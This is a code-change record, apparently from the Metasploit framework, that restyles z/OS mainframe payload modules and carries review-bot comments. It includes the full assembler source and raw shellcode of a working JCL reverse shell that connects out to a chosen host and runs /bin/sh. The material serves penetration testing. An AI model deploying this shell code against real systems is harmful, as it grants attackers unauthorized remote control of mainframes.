Land #6810, JCL payload style fixes

bug/bundler_fix
Adam Cammack 2016-04-24 13:32:32 -04:00
commit f23e09f838
GPG Key ID: C9378BA088092D66
5 changed files with 257 additions and 261 deletions


@ -44,7 +44,7 @@ class PayloadCachedSize
def self.update_cache_constant(data, cached_size)
data.
gsub(/^\s*CachedSize\s*=\s*(\d+|:dynamic).*/, '').
gsub(/^(module Metasploit\d+)\s*\n/) do |m|
gsub(/^(module MetasploitModule)\s*\n/) do |m|
"#{m.strip}\n\n CachedSize = #{cached_size}\n\n"
end
end
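Review bot: The first gsub strips any existing `CachedSize = …` line before the second gsub has checked that a `module MetasploitModule` header exists, so a payload file that still uses the older `module Metasploit3` naming (which the previous `Metasploit\d+` pattern matched) now comes back with its cached size silently deleted and nothing re-inserted. A fail-fast guard at the top of the method keeps the tool from writing a mangled file: `raise ArgumentError, 'no "module MetasploitModule" definition in data' unless data.match?(/^module MetasploitModule\b/)`. The enclosing `class PayloadCachedSize` starts outside this hunk, so I cannot tell whether a caller already validates this.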


@ -7,7 +7,6 @@
# for more information on IEFBR14
##
require 'msf/core'
require 'msf/core/handler/find_shell'
require 'msf/base/sessions/mainframe_shell'
@ -15,50 +14,49 @@ require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = :dynamic
include Msf::Payload::Single
include Msf::Payload::Mainframe
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Generic JCL Test for Mainframe Exploits',
'Description' => 'Provide JCL which can be used to submit
a job to JES2 on z/OS which will exit and return 0. This
can be used as a template for other JCL based payloads',
'Author' => 'Bigendian Smalls',
'License' => MSF_LICENSE,
'Platform' => 'mainframe',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::None,
'Session' => Msf::Sessions::MainframeShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'jcl',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
'Name' => 'Generic JCL Test for Mainframe Exploits',
'Description' => 'Provide JCL which can be used to submit
a job to JES2 on z/OS which will exit and return 0. This
can be used as a template for other JCL based payloads',
'Author' => 'Bigendian Smalls',
'License' => MSF_LICENSE,
'Platform' => 'mainframe',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::None,
'Session' => Msf::Sessions::MainframeShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'jcl',
'Payload' =>
{
'Offsets' => {},
'Payload' => ''
}
)
)
end
##
# Construct the paload
##
def generate
return super + command_string
super + command_string
end
##
# Build the command string for JCL submission
##
def command_string
return "//DUMMY JOB (MFUSER),'dummy job',\n" +
"// NOTIFY=&SYSUID,\n" +
"// MSGCLASS=H,\n" +
"// MSGLEVEL=(1,1),\n" +
"// REGION=0M\n" +
"// EXEC PGM=IEFBR14\n"
"//DUMMY JOB (MFUSER),'dummy job',\n" \
"// NOTIFY=&SYSUID,\n" \
"// MSGCLASS=H,\n" \
"// MSGLEVEL=(1,1),\n" \
"// REGION=0M\n" \
"// EXEC PGM=IEFBR14\n"
end
end
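Review bot: The header comment above `generate` still reads "Construct the paload" and the one above `command_string` does not say the job stream is fixed; suggest `# Construct the payload: the base payload from super followed by the fixed IEFBR14 job stream` and `# Static JCL that submits an IEFBR14 step (exits with RC 0); contains no placeholders to patch`. Related to that, `CachedSize = :dynamic` is kept in this module even though `generate` only appends a constant string to `super`, while the spec section at the end of this commit now declares `dynamic_size: false` for `cmd/mainframe/generic_jcl` — presumably one of the two is meant to change; worth confirming which value the spec shared example actually asserts.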


@ -8,7 +8,6 @@
# on the system as JCL to JES2
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/mainframe_shell'
@ -16,7 +15,7 @@ require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = :dynamic
CachedSize = 9001
include Msf::Payload::Single
include Msf::Payload::Mainframe
@ -24,227 +23,228 @@ module MetasploitModule
def initialize(info = {})
super(merge_info(info,
'Name' => 'Z/OS (MVS) Command Shell, Reverse TCP',
'Description' => 'Provide JCL which creates a reverse shell
This implmentation does not include ebcdic character translation,
so a client with translation capabilities is required. MSF handles
this automatically.',
'Author' => 'Bigendian Smalls',
'License' => MSF_LICENSE,
'Platform' => 'mainframe',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::MainframeShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'jcl',
'Payload' =>
'Name' => 'Z/OS (MVS) Command Shell, Reverse TCP',
'Description' => 'Provide JCL which creates a reverse shell
This implmentation does not include ebcdic character translation,
so a client with translation capabilities is required. MSF handles
this automatically.',
'Author' => 'Bigendian Smalls',
'License' => MSF_LICENSE,
'Platform' => 'mainframe',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::MainframeShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'jcl',
'Payload' =>
{
'Offsets' =>
{
'LHOST' => [ 0x1b29, 'custom' ],
'LPORT' => [ 0x1b25, 'custom' ],
'LPORT' => [ 0x1b25, 'custom' ]
},
'Payload' =>
"//REVSHL JOB (USER),'Reverse shell jcl',\n" +
"// NOTIFY=&SYSUID,\n" +
"// MSGCLASS=H,\n" +
"// MSGLEVEL=(1,1),\n" +
"// REGION=0M\n" +
"//**************************************/\n" +
"//* Generates reverse shell */\n" +
"//**************************************/\n" +
"//*\n" +
"//STEP1 EXEC PROC=ASMACLG\n" +
"//SYSIN DD *,DLM=ZZ\n" +
" TITLE 'z/os Reverse Shell'\n" +
"NEWREV CSECT\n" +
"NEWREV AMODE 31\n" +
"NEWREV RMODE 31\n" +
"***********************************************************************\n" +
"* SETUP registers and save areas *\n" +
"***********************************************************************\n" +
"MAIN LR 7,15 # R7 is base register\n" +
" NILH 7,X'1FFF' # ensure local address\n" +
" USING MAIN,0 # R8 for addressability\n" +
" DS 0H # halfword boundaries\n" +
" LA 1,ZEROES(7) # address byond which should be all 0s\n" +
" XC 0(204,1),0(1) # clear zero area\n" +
" LA 13,SAVEAREA(7) # address of save area\n" +
" LHI 8,8 # R8 has static 8\n" +
" LHI 9,1 # R9 has static 1\n" +
" LHI 10,2 # R10 has static 2\n" +
"\n" +
"***********************************************************************\n" +
"* BPX1SOC set up socket *\n" +
"***********************************************************************\n" +
"BSOC LA 0,@@F1(7) # USS callable svcs socket\n" +
" LA 3,8 # n parms\n" +
" LA 5,DOM(7) # Relative addr of First parm\n" +
" ST 10,DOM(7) # store a 2 for AF_INET\n" +
" ST 9,TYPE(7) # store a 1 for sock_stream\n" +
" ST 9,DIM(7) # store a 1 for dim_sock\n" +
" LA 15,CLORUN(7) # address of generic load & run\n" +
" BASR 14,15 # Branch to load & run\n" +
"\n" +
"***********************************************************************\n" +
"* BPX1CON (connect) connect to rmt host *\n" +
"***********************************************************************\n" +
"BCON L 5,CLIFD(7) # address of client file descriptor\n" +
" ST 5,CLIFD2(7) # store for connection call\n" +
"*** main processing **\n" +
" LA 1,SSTR(7) # packed socket string\n" +
" LA 5,CLIFD2(7) # dest for our sock str\n" +
" MVC 7(9,5),0(1) # mv packed skt str to parm array\n" +
" LA 0,@@F2(7) # USS callable svcs connect\n" +
" LA 3,6 # n parms for func call\n" +
" LA 5,CLIFD2(7) # src parm list addr\n" +
" LA 15,CLORUN(7) # address of generic load & run\n" +
" BASR 14,15 # Branch to load & run\n" +
"\n" +
"*************************************************\n" +
"* Preparte the child pid we'll spawn *\n" +
"* 0) Dupe all 3 file desc of CLIFD *\n" +
"* 1) dupe parent read fd to std input *\n" +
"*************************************************\n" +
" LHI 11,2 # Loop Counter R11=2\n" +
"@LOOP1 BRC 15,LFCNTL # call FCNTL for each FD(in,out,err)\n" +
"@RET1 AHI 11,-1 # Decrement R11\n" +
" CIJ 11,-1,7,@LOOP1 # if R11 >= 0, loop\n" +
"\n" +
"***********************************************************************\n" +
"* BPX1EXC (exec) execute /bin/sh *\n" +
"***********************************************************************\n" +
"LEXEC LA 1,EXCPRM1(7) # top of arg list\n" +
"******************************************\n" +
"**** load array of addr and constants ***\n" +
"******************************************\n" +
" ST 10,EXARG1L(7) # arg 1 len is 2\n" +
" LA 2,EXARG1L(7) # addr of len of arg1\n" +
" ST 2,16(0,1) # arg4 Addr of Arg Len Addrs\n" +
" LA 2,EXARG1(7) # addr of arg1\n" +
" ST 2,20(0,1) # arg5 Addr of Arg Addrs\n" +
" ST 9,EXARGC(7) # store 1 in ARG Count\n" +
"**************************************************************\n" +
"*** call the exec function the normal way ********************\n" +
"**************************************************************\n" +
" LA 0,@@EX1(7) # USS callable svcs EXEC\n" +
" LA 3,13 # n parms\n" +
" LA 5,EXCPRM1(7) # src parm list addr\n" +
" LA 15,CLORUN(7) # address of generic load & run\n" +
" BASR 14,15 # Branch to load & run\n" +
"\n" +
"***********************************************************************\n" +
"*** BPX1FCT (fnctl) Edit our file descriptor **************************\n" +
"***********************************************************************\n" +
"LFCNTL LA 0,@@FC1(7) # USS callable svcs FNCTL\n" +
" ST 8,@ACT(7) # 8 is our dupe2 action\n" +
" L 5,CLIFD(7) # client file descriptor\n" +
" ST 5,@FFD(7) # store as fnctl argument\n" +
" ST 11,@ARG(7) # fd to clone\n" +
" LA 3,6 # n parms\n" +
" LA 5,@FFD(7) # src parm list addr\n" +
" LA 15,CLORUN(7) # address of generic load & run\n" +
" BASR 14,15 # Branch to load & run\n" +
" BRC 15,@RET1 # Return to caller\n" +
"\n" +
"***********************************************************************\n" +
"* LOAD and run R0=func name, R3=n parms *\n" +
"* R5 = src parm list *\n" +
"***********************************************************************\n" +
"CLORUN ST 14,8(,13) # store ret address\n" +
" XR 1,1 # zero R1\n" +
" SVC 8 # get func call addr for R0\n" +
" ST 0,12(13) # Store returned addr in our SA\n" +
" L 15,12(13) # Load func addr into R15\n" +
" LHI 6,20 # offset from SA of first parm\n" +
" LA 1,0(6,13) # start of dest parm list\n" +
"@LOOP2 ST 5,0(6,13) # store parms address in parm\n" +
" AHI 3,-1 # decrement # parm\n" +
" CIJ 3,11,8,@FIX # haky fix for EXEC func\n" +
"@RETX AHI 6,4 # increment dest parm addr\n" +
" AHI 5,4 # increment src parm addr\n" +
" CIJ 3,0,7,@LOOP2 # loop until R3 = 0\n" +
" LA 5,0(6,13)\n" +
" AHI 5,-4\n" +
" OI 0(5),X'80' # last parm first bit high\n" +
"@FIN1 BALR 14,15 # call function\n" +
" L 14,8(,13) # set up return address\n" +
" BCR 15,14 # return to caller\n" +
"@FIX AHI 5,4 # need extra byte skipped for exec\n" +
" BRC 15,@RETX\n" +
"\n" +
"***********************************************************************\n" +
"* Arg Arrays, Constants and Save Area *\n" +
"***********************************************************************\n" +
" DS 0F\n" +
"*************************\n" +
"**** Func Names ****\n" +
"*************************\n" +
"@@F1 DC CL8'BPX1SOC '\n" +
"@@F2 DC CL8'BPX1CON '\n" +
"@@EX1 DC CL8'BPX1EXC ' # callable svcs name\n" +
"@@FC1 DC CL8'BPX1FCT '\n" +
"* # BPX1EXC Constants\n" +
"EXARG1 DC CL2'sh' # arg 1 to exec\n" +
"* # BPX1CON Constants\n" +
"SSTR DC X'100202PPPPaaaaaaaa'\n" +
"* # BPX1EXC Arguments\n" +
"EXCPRM1 DS 0F # actual parm list of exec call\n" +
"EXCMDL DC F'7' # len of cmd to exec\n" +
"EXCMD DC CL7'/bin/sh' # command to exec\n" +
"*********************************************************************\n" +
"******* Below this line is filled in runtime, but at compile ********\n" +
"******* is all zeroes, so it can be dropped from the shell- *********\n" +
"******* code as it will be dynamically added back and the ***********\n" +
"******* offsets are already calulated in the code *******************\n" +
"*********************************************************************\n" +
"ZEROES DS 0F # 51 4 byte slots\n" +
"EXARGC DC F'0' # num of arguments\n" +
"EXARGS DC 10XL4'00000000' # reminaing exec args\n" +
"EXARG1L DC F'0' # arg1 length\n" +
"* # BPX1FCT Arguments\n" +
"@FFD DC F'0' # file descriptor\n" +
"@ACT DC F'0' # fnctl action\n" +
"@ARG DC F'0' # argument to fnctl\n" +
"@RETFD DC F'0' # fd return\n" +
"FR1 DC F'0' # rtn code\n" +
"FR2 DC F'0' # rsn code\n" +
"* # BPX1SOC Arguments\n" +
"DOM DC F'0' # AF_INET = 2\n" +
"TYPE DC F'0' # sock stream = 1\n" +
"PROTO DC F'0' # protocol ip = 0\n" +
"DIM DC F'0' # dim_sock = 1\n" +
"CLIFD DC F'0' # client file descriptor\n" +
"SR1 DC F'0' # rtn val\n" +
"SR2 DC F'0' # rtn code\n" +
"SR3 DC F'0' # rsn code\n" +
"* # BPX1CON Arguments\n" +
"CLIFD2 DC F'0' # CLIFD\n" +
"SOCKLEN DC F'0' # length of Sock Struct\n" +
"SRVSKT DC XL2'0000' # srv socket struct\n" +
" DC XL2'0000' # port\n" +
" DC XL4'00000000' # RHOST 0.0.0.0\n" +
"CR1 DC F'0' # rtn val\n" +
"CR2 DC F'0' # rtn code\n" +
"CR3 DC F'0' # rsn code\n" +
"SAVEAREA DC 18XL4'00000000' # save area for pgm mgmt\n" +
"EOFMARK DC X'deadbeef' # eopgm marker for shellcode\n" +
" END MAIN\n" +
"ZZ\n" +
"//REVSHL JOB (USER),'Reverse shell jcl',\n" \
"// NOTIFY=&SYSUID,\n" \
"// MSGCLASS=H,\n" \
"// MSGLEVEL=(1,1),\n" \
"// REGION=0M\n" \
"//**************************************/\n" \
"//* Generates reverse shell */\n" \
"//**************************************/\n" \
"//*\n" \
"//STEP1 EXEC PROC=ASMACLG\n" \
"//SYSIN DD *,DLM=ZZ\n" \
" TITLE 'z/os Reverse Shell'\n" \
"NEWREV CSECT\n" \
"NEWREV AMODE 31\n" \
"NEWREV RMODE 31\n" \
"***********************************************************************\n" \
"* SETUP registers and save areas *\n" \
"***********************************************************************\n" \
"MAIN LR 7,15 # R7 is base register\n" \
" NILH 7,X'1FFF' # ensure local address\n" \
" USING MAIN,0 # R8 for addressability\n" \
" DS 0H # halfword boundaries\n" \
" LA 1,ZEROES(7) # address byond which should be all 0s\n" \
" XC 0(204,1),0(1) # clear zero area\n" \
" LA 13,SAVEAREA(7) # address of save area\n" \
" LHI 8,8 # R8 has static 8\n" \
" LHI 9,1 # R9 has static 1\n" \
" LHI 10,2 # R10 has static 2\n" \
"\n" \
"***********************************************************************\n" \
"* BPX1SOC set up socket *\n" \
"***********************************************************************\n" \
"BSOC LA 0,@@F1(7) # USS callable svcs socket\n" \
" LA 3,8 # n parms\n" \
" LA 5,DOM(7) # Relative addr of First parm\n" \
" ST 10,DOM(7) # store a 2 for AF_INET\n" \
" ST 9,TYPE(7) # store a 1 for sock_stream\n" \
" ST 9,DIM(7) # store a 1 for dim_sock\n" \
" LA 15,CLORUN(7) # address of generic load & run\n" \
" BASR 14,15 # Branch to load & run\n" \
"\n" \
"***********************************************************************\n" \
"* BPX1CON (connect) connect to rmt host *\n" \
"***********************************************************************\n" \
"BCON L 5,CLIFD(7) # address of client file descriptor\n" \
" ST 5,CLIFD2(7) # store for connection call\n" \
"*** main processing **\n" \
" LA 1,SSTR(7) # packed socket string\n" \
" LA 5,CLIFD2(7) # dest for our sock str\n" \
" MVC 7(9,5),0(1) # mv packed skt str to parm array\n" \
" LA 0,@@F2(7) # USS callable svcs connect\n" \
" LA 3,6 # n parms for func call\n" \
" LA 5,CLIFD2(7) # src parm list addr\n" \
" LA 15,CLORUN(7) # address of generic load & run\n" \
" BASR 14,15 # Branch to load & run\n" \
"\n" \
"*************************************************\n" \
"* Preparte the child pid we'll spawn *\n" \
"* 0) Dupe all 3 file desc of CLIFD *\n" \
"* 1) dupe parent read fd to std input *\n" \
"*************************************************\n" \
" LHI 11,2 # Loop Counter R11=2\n" \
"@LOOP1 BRC 15,LFCNTL # call FCNTL for each FD(in,out,err)\n" \
"@RET1 AHI 11,-1 # Decrement R11\n" \
" CIJ 11,-1,7,@LOOP1 # if R11 >= 0, loop\n" \
"\n" \
"***********************************************************************\n" \
"* BPX1EXC (exec) execute /bin/sh *\n" \
"***********************************************************************\n" \
"LEXEC LA 1,EXCPRM1(7) # top of arg list\n" \
"******************************************\n" \
"**** load array of addr and constants ***\n" \
"******************************************\n" \
" ST 10,EXARG1L(7) # arg 1 len is 2\n" \
" LA 2,EXARG1L(7) # addr of len of arg1\n" \
" ST 2,16(0,1) # arg4 Addr of Arg Len Addrs\n" \
" LA 2,EXARG1(7) # addr of arg1\n" \
" ST 2,20(0,1) # arg5 Addr of Arg Addrs\n" \
" ST 9,EXARGC(7) # store 1 in ARG Count\n" \
"**************************************************************\n" \
"*** call the exec function the normal way ********************\n" \
"**************************************************************\n" \
" LA 0,@@EX1(7) # USS callable svcs EXEC\n" \
" LA 3,13 # n parms\n" \
" LA 5,EXCPRM1(7) # src parm list addr\n" \
" LA 15,CLORUN(7) # address of generic load & run\n" \
" BASR 14,15 # Branch to load & run\n" \
"\n" \
"***********************************************************************\n" \
"*** BPX1FCT (fnctl) Edit our file descriptor **************************\n" \
"***********************************************************************\n" \
"LFCNTL LA 0,@@FC1(7) # USS callable svcs FNCTL\n" \
" ST 8,@ACT(7) # 8 is our dupe2 action\n" \
" L 5,CLIFD(7) # client file descriptor\n" \
" ST 5,@FFD(7) # store as fnctl argument\n" \
" ST 11,@ARG(7) # fd to clone\n" \
" LA 3,6 # n parms\n" \
" LA 5,@FFD(7) # src parm list addr\n" \
" LA 15,CLORUN(7) # address of generic load & run\n" \
" BASR 14,15 # Branch to load & run\n" \
" BRC 15,@RET1 # Return to caller\n" \
"\n" \
"***********************************************************************\n" \
"* LOAD and run R0=func name, R3=n parms *\n" \
"* R5 = src parm list *\n" \
"***********************************************************************\n" \
"CLORUN ST 14,8(,13) # store ret address\n" \
" XR 1,1 # zero R1\n" \
" SVC 8 # get func call addr for R0\n" \
" ST 0,12(13) # Store returned addr in our SA\n" \
" L 15,12(13) # Load func addr into R15\n" \
" LHI 6,20 # offset from SA of first parm\n" \
" LA 1,0(6,13) # start of dest parm list\n" \
"@LOOP2 ST 5,0(6,13) # store parms address in parm\n" \
" AHI 3,-1 # decrement # parm\n" \
" CIJ 3,11,8,@FIX # haky fix for EXEC func\n" \
"@RETX AHI 6,4 # increment dest parm addr\n" \
" AHI 5,4 # increment src parm addr\n" \
" CIJ 3,0,7,@LOOP2 # loop until R3 = 0\n" \
" LA 5,0(6,13)\n" \
" AHI 5,-4\n" \
" OI 0(5),X'80' # last parm first bit high\n" \
"@FIN1 BALR 14,15 # call function\n" \
" L 14,8(,13) # set up return address\n" \
" BCR 15,14 # return to caller\n" \
"@FIX AHI 5,4 # need extra byte skipped for exec\n" \
" BRC 15,@RETX\n" \
"\n" \
"***********************************************************************\n" \
"* Arg Arrays, Constants and Save Area *\n" \
"***********************************************************************\n" \
" DS 0F\n" \
"*************************\n" \
"**** Func Names ****\n" \
"*************************\n" \
"@@F1 DC CL8'BPX1SOC '\n" \
"@@F2 DC CL8'BPX1CON '\n" \
"@@EX1 DC CL8'BPX1EXC ' # callable svcs name\n" \
"@@FC1 DC CL8'BPX1FCT '\n" \
"* # BPX1EXC Constants\n" \
"EXARG1 DC CL2'sh' # arg 1 to exec\n" \
"* # BPX1CON Constants\n" \
"SSTR DC X'100202PPPPaaaaaaaa'\n" \
"* # BPX1EXC Arguments\n" \
"EXCPRM1 DS 0F # actual parm list of exec call\n" \
"EXCMDL DC F'7' # len of cmd to exec\n" \
"EXCMD DC CL7'/bin/sh' # command to exec\n" \
"*********************************************************************\n" \
"******* Below this line is filled in runtime, but at compile ********\n" \
"******* is all zeroes, so it can be dropped from the shell- *********\n" \
"******* code as it will be dynamically added back and the ***********\n" \
"******* offsets are already calulated in the code *******************\n" \
"*********************************************************************\n" \
"ZEROES DS 0F # 51 4 byte slots\n" \
"EXARGC DC F'0' # num of arguments\n" \
"EXARGS DC 10XL4'00000000' # reminaing exec args\n" \
"EXARG1L DC F'0' # arg1 length\n" \
"* # BPX1FCT Arguments\n" \
"@FFD DC F'0' # file descriptor\n" \
"@ACT DC F'0' # fnctl action\n" \
"@ARG DC F'0' # argument to fnctl\n" \
"@RETFD DC F'0' # fd return\n" \
"FR1 DC F'0' # rtn code\n" \
"FR2 DC F'0' # rsn code\n" \
"* # BPX1SOC Arguments\n" \
"DOM DC F'0' # AF_INET = 2\n" \
"TYPE DC F'0' # sock stream = 1\n" \
"PROTO DC F'0' # protocol ip = 0\n" \
"DIM DC F'0' # dim_sock = 1\n" \
"CLIFD DC F'0' # client file descriptor\n" \
"SR1 DC F'0' # rtn val\n" \
"SR2 DC F'0' # rtn code\n" \
"SR3 DC F'0' # rsn code\n" \
"* # BPX1CON Arguments\n" \
"CLIFD2 DC F'0' # CLIFD\n" \
"SOCKLEN DC F'0' # length of Sock Struct\n" \
"SRVSKT DC XL2'0000' # srv socket struct\n" \
" DC XL2'0000' # port\n" \
" DC XL4'00000000' # RHOST 0.0.0.0\n" \
"CR1 DC F'0' # rtn val\n" \
"CR2 DC F'0' # rtn code\n" \
"CR3 DC F'0' # rsn code\n" \
"SAVEAREA DC 18XL4'00000000' # save area for pgm mgmt\n" \
"EOFMARK DC X'deadbeef' # eopgm marker for shellcode\n" \
" END MAIN\n" \
"ZZ\n" \
"//*\n"
}))
end
# replace our own LPORT/LHOST
def replace_var(raw, name, offset, pack)
super
if( name == 'LHOST' and datastore[name] )
if name == 'LHOST' && datastore[name]
val = Rex::Socket.resolv_nbo(datastore[name])
val = val.unpack("H*")[0]
raw[offset, val.length] = val
return true
elsif(name == 'LPORT' and datastore[name] )
elsif name == 'LPORT' && datastore[name]
val = datastore[name]
val = val.to_s(16).rjust(4,'0')
val = val.to_s.to_i.to_s(16).rjust(4, '0')
raw[offset, val.length] = val
return true
else
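Review bot: `replace_var` writes `val` into `raw` at a fixed offset with no check that the placeholder is really there or that `val` fits it, so any drift in the assembler template (offsets 0x1b25/0x1b29 are hard-coded against `SSTR DC X'100202PPPPaaaaaaaa'`), an LPORT above 0xFFFF (five hex digits after `rjust(4, '0')`) or a 16-byte address from `resolv_nbo` would corrupt the surrounding source instead of failing. Suggest guarding each branch before the slice assignment: `raise ArgumentError, 'LHOST placeholder mismatch' unless raw[offset, 8] == 'aaaaaaaa' && val.length == 8` and `raise ArgumentError, 'LPORT placeholder mismatch' unless raw[offset, 4] == 'PPPP' && val.length == 4`. The method's `else` branch and end lie outside the hunk, so the behaviour for other names is not visible here.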


@ -7,14 +7,12 @@
#
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/mainframe_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = 339
include Msf::Payload::Single
@ -39,30 +37,30 @@ module MetasploitModule
'Offsets' =>
{
'LPORT' => [ 321, 'n' ],
'LHOST' => [ 323, 'ADDR' ],
'LHOST' => [ 323, 'ADDR' ]
},
'Payload' =>
"\x18\x7f\xa5\x76\x1f\xff\x41\x17\x01\x54\xd7\xcb\x10\x00\x10\x00" +
"\x41\xd7\x01\xd8\xa7\x88\x00\x08\xa7\x98\x00\x01\xa7\xa8\x00\x02" +
"\x41\x07\x01\x1c\x41\x30\x00\x08\x41\x57\x01\x9c\x50\xa7\x01\x9c" +
"\x50\x97\x01\xa0\x50\x97\x01\xa8\x41\xf7\x00\xcc\x0d\xef\x58\x57" +
"\x01\xac\x50\x57\x01\xbc\x41\x17\x01\x3e\x41\x57\x01\xbc\xd2\x08" +
"\x50\x07\x10\x00\x41\x07\x01\x24\x41\x30\x00\x06\x41\x57\x01\xbc" +
"\x41\xf7\x00\xcc\x0d\xef\xa7\xb8\x00\x02\xa7\xf4\x00\x1e\xa7\xba" +
"\xff\xff\xec\xb7\xff\xfc\xff\x7e\x41\x17\x01\x48\x50\xa7\x01\x80" +
"\x41\x27\x01\x80\x50\x20\x10\x10\x41\x27\x01\x3c\x50\x20\x10\x14" +
"\x50\x97\x01\x54\x41\x07\x01\x2c\x41\x30\x00\x0d\x41\x57\x01\x48" +
"\x41\xf7\x00\xcc\x0d\xef\x41\x07\x01\x34\x50\x87\x01\x88\x58\x57" +
"\x01\xac\x50\x57\x01\x84\x50\xb7\x01\x8c\x41\x30\x00\x06\x41\x57" +
"\x01\x84\x41\xf7\x00\xcc\x0d\xef\xa7\xf4\xff\xd3\x50\xe0\xd0\x08" +
"\x17\x11\x0a\x08\x50\x0d\x00\x0c\x58\xfd\x00\x0c\xa7\x68\x00\x14" +
"\x41\x16\xd0\x00\x50\x56\xd0\x00\xa7\x3a\xff\xff\xec\x38\x00\x14" +
"\x0b\x7e\xa7\x6a\x00\x04\xa7\x5a\x00\x04\xec\x37\xff\xf5\x00\x7e" +
"\x41\x56\xd0\x00\xa7\x5a\xff\xfc\x96\x80\x50\x00\x05\xef\x58\xe0" +
"\xd0\x08\x07\xfe\xa7\x5a\x00\x04\xa7\xf4\xff\xed\xc2\xd7\xe7\xf1" +
"\xe2\xd6\xc3\x40\xc2\xd7\xe7\xf1\xc3\xd6\xd5\x40\xc2\xd7\xe7\xf1" +
"\xc5\xe7\xc3\x40\xc2\xd7\xe7\xf1\xc6\xc3\xe3\x40\xa2\x88\x10\x02" +
"\x02\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x07\x61\x82\x89\x95" +
"\x18\x7f\xa5\x76\x1f\xff\x41\x17\x01\x54\xd7\xcb\x10\x00\x10\x00" \
"\x41\xd7\x01\xd8\xa7\x88\x00\x08\xa7\x98\x00\x01\xa7\xa8\x00\x02" \
"\x41\x07\x01\x1c\x41\x30\x00\x08\x41\x57\x01\x9c\x50\xa7\x01\x9c" \
"\x50\x97\x01\xa0\x50\x97\x01\xa8\x41\xf7\x00\xcc\x0d\xef\x58\x57" \
"\x01\xac\x50\x57\x01\xbc\x41\x17\x01\x3e\x41\x57\x01\xbc\xd2\x08" \
"\x50\x07\x10\x00\x41\x07\x01\x24\x41\x30\x00\x06\x41\x57\x01\xbc" \
"\x41\xf7\x00\xcc\x0d\xef\xa7\xb8\x00\x02\xa7\xf4\x00\x1e\xa7\xba" \
"\xff\xff\xec\xb7\xff\xfc\xff\x7e\x41\x17\x01\x48\x50\xa7\x01\x80" \
"\x41\x27\x01\x80\x50\x20\x10\x10\x41\x27\x01\x3c\x50\x20\x10\x14" \
"\x50\x97\x01\x54\x41\x07\x01\x2c\x41\x30\x00\x0d\x41\x57\x01\x48" \
"\x41\xf7\x00\xcc\x0d\xef\x41\x07\x01\x34\x50\x87\x01\x88\x58\x57" \
"\x01\xac\x50\x57\x01\x84\x50\xb7\x01\x8c\x41\x30\x00\x06\x41\x57" \
"\x01\x84\x41\xf7\x00\xcc\x0d\xef\xa7\xf4\xff\xd3\x50\xe0\xd0\x08" \
"\x17\x11\x0a\x08\x50\x0d\x00\x0c\x58\xfd\x00\x0c\xa7\x68\x00\x14" \
"\x41\x16\xd0\x00\x50\x56\xd0\x00\xa7\x3a\xff\xff\xec\x38\x00\x14" \
"\x0b\x7e\xa7\x6a\x00\x04\xa7\x5a\x00\x04\xec\x37\xff\xf5\x00\x7e" \
"\x41\x56\xd0\x00\xa7\x5a\xff\xfc\x96\x80\x50\x00\x05\xef\x58\xe0" \
"\xd0\x08\x07\xfe\xa7\x5a\x00\x04\xa7\xf4\xff\xed\xc2\xd7\xe7\xf1" \
"\xe2\xd6\xc3\x40\xc2\xd7\xe7\xf1\xc3\xd6\xd5\x40\xc2\xd7\xe7\xf1" \
"\xc5\xe7\xc3\x40\xc2\xd7\xe7\xf1\xc6\xc3\xe3\x40\xa2\x88\x10\x02" \
"\x02\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x07\x61\x82\x89\x95" \
"\x61\xa2\x88"
}))
end


@ -403,7 +403,7 @@ RSpec.describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/cmd/mainframe/generic_jcl'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'cmd/mainframe/generic_jcl'
end
@ -413,7 +413,7 @@ RSpec.describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/cmd/mainframe/reverse_shell_jcl'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'cmd/mainframe/reverse_shell_jcl'
end